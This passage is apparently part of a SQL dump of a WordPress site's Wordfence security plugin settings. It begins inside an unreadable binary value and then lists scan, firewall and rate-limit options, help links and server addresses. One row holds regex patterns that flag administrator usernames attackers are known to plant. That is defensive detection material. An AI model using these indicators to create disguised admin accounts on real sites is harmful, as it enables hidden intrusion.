��tY\\9e+�rŋk>lx-~\\�^\\��U\\O~+~�:)~�$7Ԕ�H��^���g���l���f��⦅O�f�qsL���qW�+����Y8q˶_�+��o���j��������;J�;���~��}Uq��Mq�琸���xp6Y<�.W��[���\'��_4�\'�k�_�O�\\O�\\O��g�G����Ŀ�<ĿWΊ�m��+�¾1ШF��C�����HR�]�J��~V����\Z�D�!1y{��ܳY��Yw%bVI�>!f�͋E��)�;�ŋ�|��I�{R��U+^�JT~LIVGI46�K4\r�J�d�p�D��D��dS��d�Q7ɖ�A=A�D�c�d��k�]��-C�A�>�ނ\n���}Yc#Vbz@ ��Y+�LN�X-\\�.CJl\Z]$6�L$�Hl��Kl�.I��7I�Ӓ���%�|��eq��u����i���S���s�I[K�gk��+k��瘣�]�$��@8��ߑ}* �2��ؒib��C��L��\"k�$�\nQr-�Y�Qrf+��2-���$���&�Y�Y�-����*aIn��Hn�hH��~���$飫%�M�;��;ѯ$���Hrn.Jr\'$yF����.I�QSI��I��Iak���P.)n��wHJ��%oK*=�I*r$U}a��Վ��8I��D�D��fܓԥa$u�ڒ��I������:�䉞���8V���#y�攤�<T��� i]AI���N���{���G�)�-N��s%��$H�Va%c�%���d�K2��d2�E2��d���{��dn9T���wo�@�YJ��=8�J�jBH0\'%��* �5VB:�EB\Z_���%�c�J�r뎄:�!���HHXׯJ���JD�?$b�i��ݨD2a+�7�J�$��p�źC��]֒�Cw%����U�M�U���U�T5�@�f\'U�}�j@�H�J�.�H�YK��^�ͷ~I���I�`̥ۦ RN�tOv�\"Uz��/5�&w��&��RӧR�ن�R����վ���w��X���Bz:/u��&u\"�J��K��Б��K��W�\'��^��ϸ���/��G��#��u����U�Ҡэ�sQ!��}��!�I/UKÃ�H#���W}�W���k����u��p�F_9*�騔�LђƉf��7B� M҄n�-/�&u�m�`�m�.���$��Ҕ�\\iʋjijb�4mRW��%M��-ͼ�NzǧWz7��I�4��Yz�Vi^}�4�{��薕�xs�����_ZڰNZއ�V�H+wOK+[J�,ӥU�)Ҫ7����ZҚ��҇�\r�:�Fi�O����Y��x��11G��%}�J�u+����H�\'�H��I��K_�aK�W�H�?����r���^���,���dH[x��G��$Ki�k�V�:iG�giǭ`i\'�W��p_�}�R��M��7�@��B���]��?�GoHjZ���ҡG:ҡA�t�p�tD0-���~��.�V,��,C�����tP�k���ۼ�W���]�`=%]�H���J1Rȵ�R`I\n@H��P)�E��E���jt�X�)6e�w�,�_����I �\")��;)�3XJM;\"�V��R�:���o�!_��\0H��R�F��Ӓ��\"�oR� ]*�Ke7\r�ʄ5ҥG�KP����)�Z�l�Cٚ\r��u�e�\"�d����æe��2��/�\r�d��2�e��v2��2�@�l����;2}�q�>r����o�T!3L��&_�N6�1�e�o��+ 2�u�2#���<Vv�n�̴�+3;�!3�3\'�H0�Y����z]vh���J��0AOf_�/�_ˎ�\'e�2�W)2�[Q2�ޏ2W�n����[9W��-���T7���/�y� ;ů�����|ZO�|���3����52�ɲ@�bY�|��\\X�����͏d�S�e��h�+�Q�+HGYk��*��\"Rvm�^ٵ�����e����Ȧ<Y䈁,:��,:��,�(�%��ݚ|,�\r~&Kl˒ԣd)�e�������;�,��\r��,�Yֻ]������!Y.2L�W��#�e<dųBY��HV��IV:�%+��)��\\(��{KV��$��,��\\�j�Kd���=l���n��re��N��Ų�?����rY��;�g��d�z2d/=�^5��^�e���eo�Y�6k����FY��eY;�)�d��z�7�z�1����eU�\0\"L6��I6�&��}�֔}[̓MUȦiWd��u�YX�l�Ô���E��k���n���D���雲?�ò�b�_\r������� �ɐ��d��{e(?C��M��W�p7;d����NF�+#>���U/����d�p͢FFÒdt�z�8C�Z�#c��+c1��8;d@���Q(pjd���e\"k[��U�L��Q&�J��/�ʔ\re�jt��mٿ|3ٿ�;r�A�|�G��`�|���|MN�|�\\�n����u����w�ɵ�dr��A����\\\\���|��q�4L�c�|�`�|��\\�wPMn�#��,߿n��\0���<Vn�G[n�=Wn��/7���<�+7�~Gn֝-?�l\"�\\;+���,�2�[\'��o������?�#?�~[~�6M�P�\\�@���l�Q����?˝N4ȝ�F��^�O�j�OH��=7��=�\n�&f�>�<�χP��r��&r_�g�Y�X\\ȗ���+�TxF� C����_�)���I�Gj��on��<a ��ԓ�T��qE�����:�<�g���A���J�$��\'���S~?��@�����S���ۣ�yIpy�K�<o�D^��,/��G�K���K+��ҡ!y��:�O�ȳY�8��I��k��!�Y�ZP�y_��U��m\nY��X ױ oe�����m.��v׃��fy���C)����;+;����n����Y�A�Z�a�I��}�|���|��S>*!�Ǣ��c?��/��ɿ��Ol��O�˿�ȧR�g�G�g�nȿ�u������ݑ�AS��b��� \\�ה*^� ��Tɡemr褳��$��J��1r�~��p^�zC��_��cw1�X��w�Д��l���R&\'ѳ��\0;9u&g�N�3�l��<�9Z29/맜�a��7œ���\"��HT,����� ��5\'���K���w���˗����D�J��|�v�B��C�20�X�Y�6�U�o>�P?��X�q�B�8D�a��b�D�ic�bK-X���K��}H�-�b\"I�36S��0M�{U��,]�絧��}D�/o�bߧ����\n����N������K��H���{Ta��Ha�Q��=ܧ�=械ߴ�p�R�p�)���pR��p�5Vx�7+<�9��C^>�\n/?m��p�¯�C�ﭦ�*�^sT�y�@<S�nU};��g)r�).�G*B+S�bEx���2�Vq�cJqe(Xq���\"�n��Fq�\"v�@����7lR���Yq�r��v��\"�q@�t�\"��\"EU�H�>Td\0���)��R��~T�̄*r34��ˊ���k����]Q�IWQn��(�)��*�G����^C�J�\"Eef���u��ꨨn������x���^K�챢�l�⥎��U�M�k3�����-$�����{o[E[t��3?N���蚹��ި��p�W�#�S��*>��+���(jl�����)��bt��bl����}�dزb���y���ի��wV��=����\0��T\0\Z�\n��\Zb�@�R O)PK�x��\n�6a�\n\"篂**�)k|���~��Fg*����]�k�V�\n�B�;�PޥP��R(f��3j���\0Ŋ�7�J#M�RP�\\u%^�j��T��+�w�+�]t��^���D��a�\\czN��3N��S���S��أ\\�5�Ԣ?U��W�5+u�Օ����=+7��Qnn�Pn�LVn�JW��v\\��ոr�TO��v����_��OJC�r��K�>-�r���rߵ*�����8���� \r�<ȉV���T��Q���T��S*;��tRZ�VZ����(mΚ+�N*�c�v�E�}U��(#N�l-P:Sݕ.�T����k�/���\r���\\選��rئ�B�P�l\\�<�$V�~}Ry��M�\'��<+��pWԅ*���`�z�9�t��ʋ\r�ʰ����AG�W[_(#��+�\no)�K�)of�S��(o�T*�\r��o�)K��+���5��t�)��y�2��2�1[��mV�emR�w�*ߤ(�����Z�)KW�(K�}ʚ�\'�5,o��ov�ڕ|e퇲NT>�ݩ|�{M��蠲!�W�H�R>�8�|~�G�\"gV���|�6U����������_����}T����O�nЭl��Wv�R�݉iʾȫʏeB�r���?��T�UYQ�\Z�#���#�p�-_�%��r\"���k��r2���D~UN�Ӕ�lu��W�k�)��)3��s�m���-.J\0����J �����WBn�)a�KJ8���U�ܥP\"[�(��J��q%�앒$\nP�m�*)&�Ԑ%�\\ɜ����u*��h���C)��O��X�r�!bq�\Z��x >��EC�+�r�Ji�4.��8\\CK\"B ����N�II�H���T$\r�%�P�T$Rtҥ�z�������ѠPz��n�ng@�(%虳z��C���Qe軣���@��(�����hP�-/��ˠy���g��Z��`�|W����A;��=]Л�z�,�~�_R\r��`�F�]�Q}r�p`<�=�۹`�c$L�5�i%\'a��50c�\'�N��yf`��1Xt����:eX��\0���]����y��m�-=v���`�k���0�e,P+G�����,}4\n����n�u\\���*�e�n1�_<��﯁��R�^�`����t�Y�|����d�;i�C�}��g�F}?�=6���&���q:l�U��D�6u��Nm�9��>����q�aot*x�B D\'B�o@H����*84J�L����p�D�g?9eD;�A�_eS}b�,�ؽ��\rq�VB��E�wU���8b$N2�$�H�Rgg���P#87k=��}.��Az�\\H_<2�l�Kw��2o��~\\��\nWՕ���pͰnV�@��T�;�����p�3�7�Id���c.�=}��\n��BQX)<�M�G\njP|�<<q_�����=�y���TCx�\'\Z�;~��I�b�p�\\�\0UGW��_�+\'x}��F�@�Q&����4j�B��h��_��@���p����2�M2|w���:[�O�w�s��|z�3��*`�v���֚aOY�J�\n�tB\r{�.�>Nި|�\ZU~t�/;��8`�\'���/�A���q!v�����Q{P#�7��W����hp���Ge����q��8Ƭ��tG�KG��J>�kU� /\"pb�\Z/Vt�)���$�M��I�6N���iW4p�h\r��Q4�[����,`�Q��9C��Wh~�Z\\�-���)Z^|��izh�2���F�2�*�C;�l�/:���p�K9.�\r��U�!��i�=tz:W�MD�wQ�\Z�=\\��G���8=ߏC�/�Kw5z�rB��V\\�7�L\n�5���?{�g��M�Cߜz�߃~���I�1@�?nL��@�+�9�n�x�[�bq�_w���p�5{��o�{����m^���4�4��_p?��3���x0�\Zr���6����%x8���ã�Nv���q�0�[������w�\n�}��#�y�&<��$�C����ɚ�0��?�`��=1c�[��/5�eW+̲�YS�zK=f�`Nb��o읆7�{���oM���?ǻ5���e��{���e%j,�B�Xd\\�����\n|��ş��I?G,�\\�eϻ㳄h|�� ��\r�\n�`��5+k�cո]�ҿ_V��X]�\rk<W`��I���o�b]��5��?N��3���������n`Ky~Vٌ��\r���FI�~d�w~H������3\0�t$�{ȓ�I�4�?��n.��}�r�\\E=�3Ii�g�5˔z��B}�:H9/�T��P��i@�Ѥ�M�Ҡq�i�r�\\[B�����5�\"i]J!��H{Y霉�a]7а�wIo� �=n&��d��L�!/Ȱv>�\r�L����%�4�0M*J�)�\'iʢd�^J&�$���hځ{4�|+M7/����d���溚���dn�L�H\r&d9͐��m�E�}S9�,%��6�G���B��B��E���F9�ϥ�%\Z�ts-M;L˜��yw�ts�U����\\Z�@Վ�eyŇ��eZg�N>�䛹�|�O%?�0�����5���;�6X��Pږ@���}ӂh��ڇ(��?��K�|������Xc:��M��\'P��5�����2:��H�3/PTk�\\ tj�d��+��7�(n�1JP$JPk��E����l�(���Bg����>��J-��Ԇ:?���b�)�Q�5�S�1o�{A]�J���<(kv\"]u�@�^�� �6L�v~���B9���F�Gʝ|�r���[]����2���74P���T��Dz��Å:���*���J�]���OR�g_*\r2��s*�\ZHe��P��-���F��s���=U;���2�u�I�Gһ���L ���?fPÔ�(-����o�Rs�~����h�Km��Kj_��ګ��Ou�U����s@�\\ً�ʆ��p���];-X!��rSYq��?��Φr�=V�g��U��.���yɪ]G��SVmV�uXm~\'�e��A}����<�љ���АJ�Yp�u�M`��<�ڄ�eO`����`�56���#V��a�<�x ����#\r�����<�[��l��̖�x�<a�:O��\'�ڰ��d�<Ý\'���)�3٤L���^�3�&�i~ώW`��M<��[&�b+�,��p���{���^0��ZG��;5��t/_W�˃?�\r�RmŮ�&�_�ͫ��N]e��yu�-�qِ=��c����&Bx�e(�����ղ��&{\'�?��bʾ���O�oP��f.�@-\\~����9�]�wm��ݣ����Q����q�8~��C��8tq9�ީ��O{pؚt˨�6|�s&�ٕ�g#G�_��8ҹ�#�� c\r>�Q��S?sL�O>�x�O�[ñ�9V��Oo�����+�p�ݕ���I����N����My����(�s���y��|q���h��}�����Ô�8��&_��f��k-����|{�N��ѓ��w}��|�|�..(�̅;�\"�ü(~ؖΏۺ���\"��pu.7I��E\\�Ѝ+^�s��a~i;�����n���#f��g\\�Ńk5�s��N~S�;��n��;��m������>r��Hn�|�C�p��}�4@�?���ֿ����%�Mώ�Y~����^�g3�b�گQ�P���6]Q>Q\'�]���jQ�}!�eWd���5!Q�䄋v��h�g��}O\Z8Wt\"~�XO�)�ݎ2줱��*��4���$�?�C�_���Ā��(�E����H�<8(c*Aƙd�Dj�IˣdJ��Lm6��ފ�5��V�Q�buJSlU��6Ķ���־�w�]�T���)�[�dA�HYx�U��8�*�%�ʲԌeiL�8���ӫ4Y5t���T#�;�WI������ɺ��) _+KY?{���W��4L��ٺ3M�(J��z�i�(;�%��X�\'�J�z�LҒ��v�И>rx���\rk��x+���.�W���Z9�D5����?�T�P��X- +NH�XV()k^KJ`����\'�c�%uF��S��i#$ӭH��I��sɪ�\"Y�%r���6\'A�\"$\'*Rr�%ש@�ɝ�R�?T$���R01J\n\'ΓBUy�V*u\n�q��<��E�wIqM���HI�gy:�J��<$�cʤ��@��I�~y���Tx{HŶ�RY U�w�e[����BjޚKM�Z�=~B���;���N�E�Mȓ�9(\r�{K�ۏ�О%�.��i��|2� -�����f�R�+��H�_i�>G�f͓�g�k{�|���ʷ�Q�1�]:��HG�\"�n��K��\ZS�� M�Ч$a���ͩ�fl�?�wZjȑ\0','no'),('manualScanType','onceDaily','yes'),('max404Crawlers','DISABLED','yes'),('max404Crawlers_action','throttle','yes'),('max404Humans','DISABLED','yes'),('max404Humans_action','throttle','yes'),('maxExecutionTime','0','yes'),('maxGlobalRequests','DISABLED','yes'),('maxGlobalRequests_action','throttle','yes'),('maxMem','256','yes'),('maxRequestsCrawlers','DISABLED','yes'),('maxRequestsCrawlers_action','throttle','yes'),('maxRequestsHumans','DISABLED','yes'),('maxRequestsHumans_action','throttle','yes'),('migration636_email_summary_excluded_directories','1','no'),('needsNewTour_blocking','1','yes'),('needsNewTour_dashboard','1','yes'),('needsNewTour_firewall','1','yes'),('needsNewTour_livetraffic','1','yes'),('needsNewTour_loginsecurity','1','yes'),('needsNewTour_scan','1','yes'),('needsUpgradeTour_blocking','0','yes'),('needsUpgradeTour_dashboard','0','yes'),('needsUpgradeTour_firewall','0','yes'),('needsUpgradeTour_livetraffic','0','yes'),('needsUpgradeTour_loginsecurity','0','yes'),('needsUpgradeTour_scan','0','yes'),('neverBlockBG','neverBlockVerified','yes'),('noc1ScanSchedule','a:2:{i:0;i:1629939600;i:1;i:1630198800;}','yes'),('notification_blogHighlights','1','yes'),('notification_productUpdates','1','yes'),('notification_promotions','1','yes'),('notification_scanStatus','1','yes'),('notification_securityAlerts','1','yes'),('notification_updatesNeeded','1','yes'),('onboardingAttempt1','skipped','yes'),('onboardingAttempt2','','no'),('onboardingAttempt3','','no'),('onboardingAttempt3Initial','0','yes'),('originalScheduledScanStart','1629680400','yes'),('other_blockBadPOST','0','yes'),('other_bypassLitespeedNoabort','0','yes'),('other_hideWPVersion','0','yes'),('other_pwStrengthOnUpdate','1','yes'),('other_scanComments','1','yes'),('other_scanOutside','0','yes'),('other_WFNet','1','yes'),('previousWflogsFileList','[\".htaccess\",\"config.php\",\"config-livewaf.php\",\"rules.php\",\"template.php\",\"config-synced.php\",\"GeoLite2-Country.mmdb\",\"ips.php\",\"attack-data.php\",\"config-transient.php\"]','yes'),('scanFileProcessing','','yes'),('scansEnabled_checkGSB','1','yes'),('scansEnabled_checkHowGetIPs','1','yes'),('scansEnabled_checkReadableConfig','1','yes'),('scansEnabled_comments','1','yes'),('scansEnabled_core','1','yes'),('scansEnabled_coreUnknown','1','yes'),('scansEnabled_diskSpace','1','yes'),('scansEnabled_fileContents','1','yes'),('scansEnabled_fileContentsGSB','1','yes'),('scansEnabled_geoipSupport','1','yes'),('scansEnabled_highSense','0','yes'),('scansEnabled_malware','1','yes'),('scansEnabled_oldVersions','1','yes'),('scansEnabled_options','1','yes'),('scansEnabled_passwds','1','yes'),('scansEnabled_plugins','0','yes'),('scansEnabled_posts','1','yes'),('scansEnabled_scanImages','0','yes'),('scansEnabled_suspectedFiles','1','yes'),('scansEnabled_suspiciousAdminUsers','1','yes'),('scansEnabled_suspiciousOptions','1','yes'),('scansEnabled_themes','0','yes'),('scansEnabled_wafStatus','1','yes'),('scansEnabled_wpscan_directoryListingEnabled','1','yes'),('scansEnabled_wpscan_fullPathDisclosure','1','yes'),('scanStageStatuses','a:11:{s:13:\"spamvertising\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:4:\"spam\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:9:\"blacklist\";a:4:{s:6:\"status\";s:7:\"premium\";s:7:\"started\";i:0;s:8:\"finished\";i:0;s:8:\"expected\";i:0;}s:6:\"server\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:5;s:8:\"finished\";i:5;s:8:\"expected\";i:5;}s:7:\"changes\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:6:\"public\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"malware\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}s:7:\"content\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:3;s:8:\"finished\";i:3;s:8:\"expected\";i:3;}s:8:\"password\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:13:\"vulnerability\";a:4:{s:6:\"status\";s:16:\"complete-warning\";s:7:\"started\";i:1;s:8:\"finished\";i:1;s:8:\"expected\";i:1;}s:7:\"options\";a:4:{s:6:\"status\";s:16:\"complete-success\";s:7:\"started\";i:2;s:8:\"finished\";i:2;s:8:\"expected\";i:2;}}','no'),('scanTime','1629717530.2851','yes'),('scanType','standard','yes'),('scan_exclude','','yes'),('scan_include_extra','','yes'),('scan_maxDuration','','yes'),('scan_maxIssues','1000','yes'),('schedMode','auto','yes'),('schedStartHour','12','yes'),('scheduledScansEnabled','1','yes'),('serverDNS','1629735700;300;54.38.72.186','yes'),('serverIP','1629680883;51.77.116.174','yes'),('showAdminBarMenu','1','yes'),('showWfCentralUI','1','yes'),('signatureUpdateTime','1629667532','yes'),('spamvertizeCheck','1','yes'),('ssl_verify','1','yes'),('startScansRemotely','0','yes'),('supportContent','{\"top\":[{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":0},{\"title\":\"Optimizing The Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":1},{\"title\":\"Wordfence Web Application Firewall (WAF)\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"order\":2},{\"title\":\"Scan Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3},{\"title\":\"Wordfence and LiteSpeed\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/litespeed\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Firewall Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":6},{\"title\":\"Scan Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":7},{\"title\":\"I am locked out of my site\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/#i-am-locked-out-of-my-site\",\"order\":8},{\"title\":\"PHP Fatal error: Failed opening required wordfence-waf.php\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/#php-fatal-error-failed-opening-required-wordfence-waf-php\",\"order\":9}],\"all\":[{\"title\":\"Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/\",\"excerpt\":\"Wordfence Central provides a powerful and efficient way to manage the security of many WordPress sites via a single interface.\",\"children\":[{\"title\":\"Connecting your sites to Wordfence Central\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/connect\\/\",\"order\":0},{\"title\":\"Setting up two-factor authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/2fa\\/\",\"order\":1},{\"title\":\"Using the Dashboard page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/central\\/\",\"order\":2},{\"title\":\"Using the Configuration page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/configuration\\/\",\"order\":3},{\"title\":\"Using Wordfence plugin options Templates\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/templates\\/\",\"order\":4},{\"title\":\"Using the Settings page\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/settings\\/\",\"order\":5},{\"title\":\"Using Wordfence Central Teams\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/teams\\/\",\"order\":6},{\"title\":\"Viewing scan Findings\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/central\\/findings\\/\",\"order\":7}],\"order\":0},{\"title\":\"Dashboard\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/\",\"excerpt\":\"The Wordfence Dashboard provides insight into the current state of your site’s security.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/options\\/\",\"order\":0},{\"title\":\"Alerts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/dashboard\\/alerts\\/\",\"order\":1}],\"order\":1},{\"title\":\"Firewall\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/\",\"excerpt\":\"The Wordfence Web Application Firewall is a PHP based, application level firewall that filters out malicious requests to your site. \",\"children\":[{\"title\":\"Optimizing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/optimizing-the-firewall\\/\",\"order\":0},{\"title\":\"Learning Mode\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/learning-mode\\/\",\"order\":1},{\"title\":\"Statistics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/statistics\\/\",\"order\":2},{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/options\\/\",\"order\":3},{\"title\":\"MySQLi storage engine\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/mysqli-storage-engine\\/\",\"order\":4},{\"title\":\"Brute Force Protection\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/brute-force\\/\",\"order\":5},{\"title\":\"Rate Limiting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/rate-limiting\\/\",\"order\":6},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/firewall\\/troubleshooting\\/\",\"order\":7}],\"order\":2},{\"title\":\"Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/\",\"excerpt\":\"Aside from the Firewall rules that protect against SQL-injection, XSS and more, Wordfence also has custom features for additional blocking. \",\"children\":[{\"title\":\"Country Blocking\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/country-blocking\\/\",\"order\":0},{\"title\":\"Blocking Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/blocking\\/troubleshooting\\/\",\"order\":1}],\"order\":3},{\"title\":\"Scan\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/\",\"excerpt\":\"A Wordfence scan examines all files on your WordPress website looking for malicious code, backdoors, shells that hackers have installed, known malicious URLs and known patterns of infections.\",\"children\":[{\"title\":\"Options\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/options\\/\",\"order\":0},{\"title\":\"Results\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scan-results\\/\",\"order\":1},{\"title\":\"Scheduling\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/scheduling\\/\",\"order\":2},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/scan\\/troubleshooting\\/\",\"order\":3}],\"order\":4},{\"title\":\"Tools\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/\",\"excerpt\":\"Wordfence Tools include Two Factor Authentication, Whois Lookup, Password Audit, Live Traffic and Diagnostics.\",\"children\":[{\"title\":\"Import\\/Export\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/import-export\\/\",\"order\":0},{\"title\":\"Password Auditing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/password-auditing\\/\",\"order\":1},{\"title\":\"Whois Lookup\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/whois-lookup\\/\",\"order\":2},{\"title\":\"Diagnostics\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/diagnostics\\/\",\"order\":3},{\"title\":\"Live Traffic\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/live-traffic\\/\",\"order\":4},{\"title\":\"Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/two-factor-authentication\\/\",\"order\":5},{\"title\":\"Legacy Two-Factor Authentication\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/tools\\/legacy-two-factor-authentication\\/\",\"order\":6}],\"order\":5},{\"title\":\"Login Security\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security\\/\",\"excerpt\":\"The Login Security page currently contains settings for two-factor authentication (2FA) and reCAPTCHA. In a future Wordfence version, existing login-related features will also move to the same page.\",\"order\":6},{\"title\":\"Advanced\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/\",\"excerpt\":\"If you want to know more about the technical details of Wordfence, you\'ll find the answers in this section.\",\"children\":[{\"title\":\"System requirements\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/system-requirements\\/\",\"order\":0},{\"title\":\"Changelog\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/changelog\\/\",\"order\":1},{\"title\":\"Remove or Reset\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/remove-or-reset\\/\",\"order\":2},{\"title\":\"Technical Details\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/technical-details\\/\",\"order\":3},{\"title\":\"Constants\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/constants\\/\",\"order\":4},{\"title\":\"Wordfence API\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/wordfence-api\\/\",\"order\":5},{\"title\":\"Troubleshooting\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/troubleshooting\\/\",\"order\":6},{\"title\":\"Plugin \\/ Theme Conflicts\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/advanced\\/plugin-theme-conflicts\\/\",\"order\":7}],\"order\":7},{\"title\":\"Wordfence Premium\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/\",\"excerpt\":\"Wordfence Premium comes with an IP Blocklist, Real Time Protection and much more.\",\"children\":[{\"title\":\"Account\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/account\\/\",\"order\":0},{\"title\":\"Pricing\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/pricing\\/\",\"order\":1},{\"title\":\"License Key\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/premium\\/api-key\\/\",\"order\":2}],\"order\":8},{\"title\":\"Wordfence and GDPR - General Data Protection Regulation\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/\",\"excerpt\":\"Defiant, the company behind Wordfence, has updated its terms of use, privacy policies and software, as well as made available a data processing agreement to meet GDPR compliance. Customers must review and agree to updated terms in order to continue using our products and services. We also provide a data processing agreement if you qualify as a data controller under the GDPR.\",\"children\":[{\"title\":\"Sub-Processors List\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/general-data-protection-regulation\\/sub-processors-list\\/\",\"order\":0}],\"order\":9},{\"title\":\"Site Cleaning and Security Audits\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/security-services\\/\",\"excerpt\":\"Let one of our Security Analysts help you clean your infected site or inspect it for vulnerabilities.\",\"order\":10},{\"title\":\"Login Security Plugin\",\"permalink\":\"https:\\/\\/www.wordfence.com\\/help\\/login-security-plugin\\/\",\"excerpt\":\"The Wordfence Login Security plugin contains a subset of the features found in the full Wordfence plugin: Two-factor Authentication, XML-RPC Protection and Login Page CAPTCHA. It is ideal for sites that need login security functionality but either can’t or don’t want to run the full Wordfence plugin.\",\"order\":11}]}','yes'),('supportHash','861fa35ee92ea792bee38ef73e0d7326fc59d39ea2f0acfe3a0b998811dfbf3c','yes'),('suspiciousAdminUsernames','a:2:{i:0;s:46:\"/^wp\\.service\\.controller(?:\\.[a-zA-Z0-9]+)$/i\";i:1;s:55:\"/^(?:wordpressssadmin|wordprestadmin|jaime.besser56)$/i\";}','yes'),('timeoffset_wf','0','yes'),('timeoffset_wf_updated','1629717524','yes'),('tldlist','|com|org|net|edu|aaa|abb|abc|aco|ads|aeg|afl|aig|anz|aol|app|art|aws|axa|bar|bbc|bbt|bcg|bcn|bet|bid|bio|biz|bms|bmw|bom|boo|bot|box|buy|bzh|cab|cal|cam|car|cat|cba|cbn|cbs|ceo|cfa|cfd|cpa|crs|csc|dad|day|dds|dev|dhl|diy|dnp|dog|dot|dtv|dvr|eat|eco|esq|eus|fan|fit|fly|foo|fox|frl|ftr|fun|fyi|gal|gap|gay|gdn|gea|gle|gmo|gmx|goo|gop|got|gov|hbo|hiv|hkt|hot|how|ibm|ice|icu|ifm|inc|ing|ink|int|ist|itv|jcb|jio|jll|jmp|jnj|jot|joy|kfh|k